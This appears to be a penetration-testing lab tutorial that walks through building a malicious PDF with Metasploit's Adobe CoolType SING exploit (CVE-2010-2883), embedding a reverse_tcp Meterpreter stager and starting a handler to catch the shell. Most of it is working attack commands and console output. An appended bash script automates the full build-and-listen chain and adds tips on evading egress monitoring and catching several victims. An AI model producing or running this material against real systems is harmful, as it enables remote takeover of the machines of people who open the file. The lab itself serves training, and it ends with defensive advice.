Create a Malicious PDF File for a Client-Side Attack


Introduction

In this lab, you will build a client-side attack by creating a malicious PDF file with the Metasploit Framework. Client-side attacks target vulnerabilities in applications on a user's computer, such as web browsers, media players, or document viewers, rather than in services exposed on the network.

PDF files are a common vector for these attacks because they are widely used and often trusted by users. By embedding malicious code (a payload) into a seemingly harmless PDF, an attacker can gain control over a victim's system when the file is opened with a vulnerable PDF reader. Note that it is the reader application that gets exploited, not the operating system, so the payload runs with the privileges of the user who opened the file.

You will learn how to select a specific exploit, configure it with a payload, generate the malicious file, and set up a listener to handle the connection from the compromised system. This lab provides a foundational understanding of how such attacks are constructed.

Select the exploit/windows/fileformat/adobe_cooltype_sing module

In this step, you will start the Metasploit Framework console and select the appropriate exploit module for creating a malicious PDF. The Metasploit Framework is a powerful tool for penetration testing, and its console, msfconsole, is the primary interface for interacting with it.

First, open a terminal and launch the Metasploit console. This may take a moment to initialize.

msfconsole -q

The -q flag suppresses the banner for a quicker start. Once loaded, you'll see the msf6 > prompt.

We will use an exploit that targets a known vulnerability in Adobe Reader: CVE-2010-2883, a stack buffer overflow in the CoolType font engine's handling of the SING table of an embedded TrueType font. It affects Adobe Reader 8.2.4 and 9.3.4 and earlier; a patched reader is not affected, so the generated file is only useful against those old versions. The module is named exploit/windows/fileformat/adobe_cooltype_sing. Use the use command to load this module.

use exploit/windows/fileformat/adobe_cooltype_sing

After executing the command, you will notice that the command prompt changes to reflect the currently loaded module.

msf6 > use exploit/windows/fileformat/adobe_cooltype_sing
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(windows/fileformat/adobe_cooltype_sing) >

This confirms that the module is now active and ready for configuration.

Set the FILENAME option for the output PDF

In this step, you will configure the options for the selected exploit module. Each module has a set of options that you can customize. To see the available options for the current module, use the show options command.

show options

This command will display a table of parameters you can set, such as the filename for the output file and payload settings.

Module options (exploit/windows/fileformat/adobe_cooltype_sing):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.pdf          yes       The file name.
   ...

Payload options (generic/shell_reverse_tcp):
...

We need to set the FILENAME option to specify the name of our malicious PDF file. We'll name it malicious.pdf. Use the set command to assign this value.

set FILENAME malicious.pdf

You can run show options again to verify that the FILENAME has been updated successfully.

FILENAME  malicious.pdf    yes       The file name.

Configure a reverse_tcp payload with LHOST and LPORT

In this step, you will configure the payload. A payload is the code that will be executed on the target system after the exploit succeeds. We will use a reverse_tcp payload, which makes the victim's machine open an outbound TCP connection back to our machine. An outbound connection is far more likely to get through NAT and egress firewalls than a bind payload, which would wait for us to connect in.

First, set the payload to windows/meterpreter/reverse_tcp. Meterpreter is an advanced, dynamically extensible payload that provides more features than a standard shell. This payload is staged: the PDF carries only a small stager, and the full Meterpreter DLL is sent by our handler after the victim connects, which is why the handler you start later must use exactly the same payload.

set payload windows/meterpreter/reverse_tcp

Next, we need to configure the payload's options: LHOST and LPORT.

  • LHOST: This is the "Listening Host," the IP address your machine is reachable on from the victim. The victim's machine will connect back to this IP, so if the victim is behind NAT relative to you, this must be your public or port-forwarded address, not a private one.
  • LPORT: This is the "Listening Port," the port on your machine that will be listening for the connection. Any port the victim is allowed to reach outbound works; 4444 is the Metasploit default and is widely known to defenders, so real engagements often use 443 to blend in with HTTPS traffic.

To find your machine's IP address, you can open a new terminal tab and run the ip a command. Look for the IP address associated with the eth0 interface.

ip a

Now, set LHOST to your IP address (replace YOUR_IP_ADDRESS with the actual IP) and LPORT to a common port like 4444.

set LHOST YOUR_IP_ADDRESS
set LPORT 4444

Run show options one more time to confirm all settings are correct. You should see your configured FILENAME, PAYLOAD, LHOST, and LPORT.

Generate the malicious PDF file

In this step, with all the options configured, you are ready to generate the malicious PDF file. For fileformat modules the exploit command (or its alias run) does not attack anything over the network; it assembles the exploit and the payload into the final file and writes it to disk.

Execute the exploit command in your msfconsole window.

exploit

Metasploit will now create the PDF file. The output will show the process and, most importantly, where the file has been saved.

[*] Creating 'malicious.pdf' file...
[+] malicious.pdf stored at /home/labex/.msf4/local/malicious.pdf

The file is now created. In a real-world scenario, an attacker would deliver this file to a target, for example, as an email attachment. You can verify its existence using the ls command in a new terminal.

ls -l /home/labex/.msf4/local/malicious.pdf
-rw-r--r-- 1 labex labex 12345 Date Time /home/labex/.msf4/local/malicious.pdf

Set up a handler in msfconsole to catch the shell

In this step, you will set up a listener, also known as a handler, to "catch" the incoming connection from the victim machine when the malicious PDF is opened. Without a handler, the payload has nowhere to connect to.

We will use the exploit/multi/handler module, which is a generic listener.

use exploit/multi/handler

Now, you must configure this handler to match what you embedded in the PDF file: the same payload and the same LPORT, and an LHOST on which the handler can bind. This is crucial for the connection to succeed, because a mismatched payload means the stager receives a stage it cannot run. For the handler, LHOST is the bind address, so it may be the same IP you embedded in the PDF or 0.0.0.0 to listen on all interfaces.

set payload windows/meterpreter/reverse_tcp
set LHOST YOUR_IP_ADDRESS
set LPORT 4444

Remember to replace YOUR_IP_ADDRESS with your machine's IP address again.

With the handler configured, run it using the exploit -j command. The -j flag runs the handler as a background job, which keeps your msfconsole prompt free for other commands while the listener is active.

exploit -j

You will see a confirmation that the handler has started.

[*] Exploit running as background job 0.
[*] Started reverse TCP handler on YOUR_IP_ADDRESS:4444

The handler is now listening for a connection. You can list running jobs with the jobs command, and when a victim opens the file a new Meterpreter session will be announced; sessions -l lists sessions and sessions -i 1 interacts with the first one. By default the handler exits after catching one session; set ExitOnSession false before starting it if you expect several victims. In this lab, we will not simulate a victim opening the file, but your setup is complete. You have successfully created a malicious file and prepared a listener to handle the reverse shell.
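The whole procedure above, from selecting the module to backgrounding the handler, can be driven from one msfconsole resource script instead of being typed by hand. The script below is an added example written for this page; it is not code from the original lab or from the Metasploit project. It assumes an attacker address of 10.0.2.15 (an example value, override it by exporting LHOST), port 4444, the default output directory ~/.msf4/local that fileformat modules use, and that msfconsole is on PATH. It refuses the YOUR_IP_ADDRESS placeholder, because a PDF built with a non-address LHOST carries a payload that can never call back, and it checks that the generated file really starts with a PDF header before you hand it on.

```shell
#!/usr/bin/env bash
# Added example (not from the lab or Metasploit): build the malicious PDF
# and start the matching handler from a single resource script.
# Assumed values: LHOST 10.0.2.15, LPORT 4444, output in ~/.msf4/local.
set -u

LHOST="${LHOST:-10.0.2.15}"          # replace with your eth0 address, or export LHOST
LPORT="${LPORT:-4444}"
FILENAME="${FILENAME:-malicious.pdf}"
RC="${RC:-build_pdf.rc}"

# Accept only a dotted quad with octets 0-255. Rejects the lab's placeholder
# "YOUR_IP_ADDRESS", hostnames, and malformed addresses such as 10.0.2.256.
valid_ipv4() {
    local ip="$1" octet
    case "$ip" in
        *[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    set -- $(printf '%s' "$ip" | tr '.' ' ')
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Write the resource script: $1 = LHOST, $2 = LPORT, $3 = FILENAME, $4 = path.
# Lines beginning with '#' are comments to msfconsole.
write_rc() {
    cat > "$4" <<EOF
# Steps 1-4: select the file-format exploit, name the output, embed a
# reverse_tcp Meterpreter stager that calls back to $1:$2, write the PDF.
use exploit/windows/fileformat/adobe_cooltype_sing
set FILENAME $3
set payload windows/meterpreter/reverse_tcp
set LHOST $1
set LPORT $2
exploit
# Step 5: handler with the identical payload and port. ExitOnSession false
# keeps it listening after the first victim; -j -z backgrounds it without
# dropping you into the session, so the prompt stays free.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $1
set LPORT $2
set ExitOnSession false
exploit -j -z
EOF
}

# The module writes a real PDF; confirm the magic bytes before delivery.
is_pdf() {
    [ -f "$1" ] && [ "$(head -c 5 "$1" 2>/dev/null)" = "%PDF-" ]
}

main() {
    if ! valid_ipv4 "$LHOST"; then
        echo "LHOST '$LHOST' is not an IPv4 address; set it to your eth0 address" >&2
        return 1
    fi
    write_rc "$LHOST" "$LPORT" "$FILENAME" "$RC"
    echo "wrote $RC"
    if command -v msfconsole >/dev/null 2>&1; then
        # -q suppresses the banner, -r runs the resource script, then the
        # console stays open with the handler running as a background job.
        msfconsole -q -r "$RC"
    else
        echo "msfconsole not found; run it yourself: msfconsole -q -r $RC" >&2
    fi
    out="$HOME/.msf4/local/$FILENAME"
    if is_pdf "$out"; then
        echo "generated $out"
    fi
}

main
```

Run it as `LHOST=192.168.56.101 ./build_pdf.sh`; the resource script it leaves behind is also a reusable record of exactly which payload, address and port went into the file, which is what you will need to reproduce the handler later.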

Summary

In this lab, you have successfully walked through the fundamental steps of creating a malicious PDF for a client-side attack using the Metasploit Framework.

You learned how to:

  • Launch the Metasploit console and select an appropriate exploit module.
  • Configure exploit options, such as the output filename.
  • Select and configure a payload (windows/meterpreter/reverse_tcp) with the necessary LHOST and LPORT parameters.
  • Generate the final malicious PDF file.
  • Set up and run a handler (exploit/multi/handler) to listen for and catch the incoming connection from a compromised system.

This exercise provides a practical understanding of the mechanics behind a common attack vector. It also shows where defenders can break the chain: keeping software, especially document readers, up to date removes the vulnerability the file depends on, and restricting outbound connections from workstations would stop the reverse_tcp callback even if the exploit fired.